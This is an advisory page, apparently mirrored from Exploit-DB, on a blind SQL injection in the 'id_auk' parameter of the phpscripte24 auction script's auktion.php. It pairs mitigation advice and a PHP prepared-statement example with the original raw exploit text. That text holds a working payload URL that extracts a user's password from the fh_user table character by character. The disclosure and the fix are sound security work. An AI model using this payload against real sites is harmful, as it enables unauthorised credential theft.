Vendor: Vor und Rückwärts Auktions System
By: Easy Laster
CVSS: 8.8 (HIGH)
Vulnerability type: Blind SQL Injection
CWE: 89
Product Name: Vor und Rückwärts Auktions System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection auktion.php

A blind SQL injection vulnerability exists in the phpscripte24 Vor und Rückwärts Auktions System. The flaw lies in how the 'auktion.php' script handles the 'id_auk' parameter: an attacker can append SQL conditions to it and, by observing the page's true/false behaviour, infer the contents of the database. This can be used to extract sensitive information such as user passwords.

Mitigation:

The vendor recommends updating to the latest version of the phpscripte24 Vor und Rückwärts Auktions System. Additionally, input to 'id_auk' should be validated (it is only ever an integer) so that SQL fragments cannot reach the query.
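As an added illustration of that mitigation (not code from phpscripte24 or from the advisory's author, whose source is not on this page), one way to handle the 'id_auk' parameter in PHP: validate it as a positive integer, then bind it to a prepared statement so the value can never alter the query text. The table name 'auktion', the PDO connection details and the 404 handling are assumptions.

```php
<?php
// Added example, not the phpscripte24 source (the advisory does not show it).
// Assumptions: a PDO connection to the auction database and a table "auktion"
// whose integer primary key column is "id_auk".

function loadAuction(PDO $pdo, array $query): ?array
{
    // 1. Allow-list validation. The only legitimate shape of id_auk is a positive
    //    integer, so a value carrying SQL fragments (the advisory's
    //    "1+and+1=1+and+ascii(substring(...))>1") is rejected before any query runs.
    //    filter_var() also returns false for a missing value or an array (id_auk[]=1).
    $id = filter_var(
        $query['id_auk'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        return null;
    }

    // 2. Prepared statement with a bound parameter. The value travels separately
    //    from the SQL text, so it cannot change the query's structure even if the
    //    validation above were later relaxed.
    $stmt = $pdo->prepare('SELECT * FROM auktion WHERE id_auk = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage inside the page script (connection parameters are placeholders).
$pdo = new PDO(
    'mysql:host=localhost;dbname=AUCTION_DB;charset=utf8mb4',
    'DB_USER',
    'DB_PASSWORD',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

$auction = loadAuction($pdo, $_GET);
if ($auction === null) {
    // Invalid or unknown id: answer uniformly, without echoing database errors
    // or query details that would give an attacker extra feedback.
    http_response_code(404);
    exit('Auction not found');
}
```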

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection auktion.php
+Autor : Easy Laster
+Date   : 02.04.2010
+Script  : phpscripte24 Vor und Rückwärts Auktions System
+Price : € 299.00
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/auktion/auktion.php?id_auk=

#password
+Exploitable   : http://www.site.com/auktion/auktion.php?id_auk=1+and+1=1+and+ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1

-----------------------------------------------------------------------------------------